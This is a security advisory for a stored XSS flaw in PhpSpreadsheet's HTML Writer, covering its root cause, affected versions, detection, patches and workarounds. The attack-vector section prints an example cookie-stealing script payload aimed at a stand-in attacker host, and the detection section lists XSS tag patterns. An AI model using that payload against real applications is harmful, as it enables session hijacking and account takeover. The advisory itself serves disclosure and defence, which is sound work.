CVE-2026-35453: PhpSpreadsheet XSS Vulnerability

CVE-2026-35453 Overview

CVE-2026-35453 is a stored Cross-Site Scripting (XSS) vulnerability in PhpSpreadsheet, a widely used PHP library for reading and writing spreadsheet files. The HTML Writer component fails to apply htmlspecialchars() output escaping when a cell uses a custom number format containing the @ text placeholder combined with literal text such as @ "items". An attacker who can control cell content in a spreadsheet processed by the HTML Writer can inject arbitrary HTML and JavaScript into the rendered output. The flaw is tracked as CWE-79 and was disclosed in GHSA-6wpp-88cp-7q68.

Critical Impact

Attacker-controlled spreadsheet cells can execute arbitrary JavaScript in the browser of any user viewing the HTML output, enabling session hijacking and account takeover in applications that render spreadsheets server-side.

Affected Products

• PhpSpreadsheet versions 1.30.3 and earlier
• PhpSpreadsheet versions 2.0.0 through 2.1.15, 2.2.0 through 2.4.4
• PhpSpreadsheet versions 3.3.0 through 3.10.4, and 4.0.0 through 5.6.0

Discovery Timeline

• 2026-05-05 - CVE-2026-35453 published to NVD
• 2026-05-07 - Last updated in NVD database

Technical Details for CVE-2026-35453

Vulnerability Analysis

PhpSpreadsheet's HTML Writer converts spreadsheet content to HTML for browser rendering. During this conversion, the formatter applies the cell's number format code to produce the displayed string. The library uses a callback-based approach to escape HTML special characters in formatted cell output, but this callback is invoked conditionally rather than on all rendered values.

The escaping logic compares the formatted output to the original cell value. If the two strings match exactly, the escaping callback runs as expected. When a custom format contains the @ text placeholder alongside quoted literal text, the formatter substitutes the raw cell value into the format string and returns early. This early return path bypasses the escaping callback entirely, allowing raw cell content to flow into the HTML document.

Applications that ingest user-supplied spreadsheets and render them as HTML are exposed. Common use cases include data import previews, reporting portals, and collaboration tools.

Root Cause

The root cause is an inconsistent output encoding policy in the HTML Writer's number-format handler. Output escaping is treated as conditional on a value-comparison check rather than as a mandatory final step before HTML emission. Format codes such as @ "items" produce a formatted string that differs from the raw cell value, which causes the comparison check to skip the encoding routine.

Attack Vector

An attacker supplies a crafted spreadsheet (XLSX, ODS, or other supported format) where a target cell contains an HTML or JavaScript payload such as <script>fetch('//attacker/'+document.cookie)</script>. The attacker also sets that cell's number format to a code containing @ plus quoted literal text. When the victim application renders the workbook with HtmlWriter, the payload is written verbatim into the HTML output and executes in the browser context of any user viewing the page.

No authentication on the application is required if anonymous spreadsheet upload is permitted. User interaction is limited to viewing the rendered HTML.

Detection Methods for CVE-2026-35453

Indicators of Compromise

• Spreadsheet files containing cells whose number format code includes the @ placeholder combined with quoted literals such as @ "items" or "prefix"@.
• Cell values containing HTML tags such as <script>, <img onerror=...>, or <svg onload=...> paired with text-style number formats.
• Outbound HTTP requests from end-user browsers to unexpected hosts shortly after viewing rendered spreadsheet content.

Detection Strategies

• Inventory PHP applications using composer show phpoffice/phpspreadsheet and flag any version outside the patched releases 1.30.4, 2.1.16, 2.4.5, 3.10.5, or 5.7.0.
• Inspect HTTP responses from spreadsheet-rendering endpoints for unescaped angle brackets inside <td> elements that originated from cell values.
• Add static analysis rules that flag direct calls to PhpOffice\PhpSpreadsheet\Writer\Html::generateHTMLAll() or save() on workbooks built from untrusted input.

Monitoring Recommendations

• Log spreadsheet upload events with file hashes and submitting user identity to enable retroactive investigation.
• Enable Content Security Policy reporting on pages that render PhpSpreadsheet HTML output to capture inline-script violations.
• Alert on web application firewall rules matching <script or common XSS payload patterns inside multipart spreadsheet uploads.

How to Mitigate CVE-2026-35453

Immediate Actions Required

• Upgrade PhpSpreadsheet immediately to a patched release: 1.30.4, 2.1.16, 2.4.5, 3.10.5, or 5.7.0 depending on the major version branch in use.
• Audit application code paths that pass user-uploaded workbooks to Writer\Html and restrict this functionality to authenticated, trusted users until patched.
• Review historical spreadsheet uploads for cells containing script payloads combined with text-format number codes.

Patch Information

The maintainers fixed the issue in PhpSpreadsheet 1.30.4, 2.1.16, 2.4.5, 3.10.5, and 5.7.0. The patches ensure the HTML Writer applies htmlspecialchars() escaping to all formatted output regardless of whether the formatter took the early-return path. See the PhpSpreadsheet GitHub Security Advisory GHSA-6wpp-88cp-7q68 for full release notes.

Workarounds

• Apply a strict Content Security Policy that disallows inline scripts (script-src 'self') on pages that embed HTML produced by PhpSpreadsheet.
• Post-process the HTML Writer output through an HTML sanitizer such as HTML Purifier before delivering it to browsers.
• Reject or strip non-default number format codes from uploaded workbooks until the library is upgraded.

# Configuration example
composer require phpoffice/phpspreadsheet:^5.7.0
composer update phpoffice/phpspreadsheet
php -r "require 'vendor/autoload.php'; echo \PhpOffice\PhpSpreadsheet\Settings::getLibraryVersion();"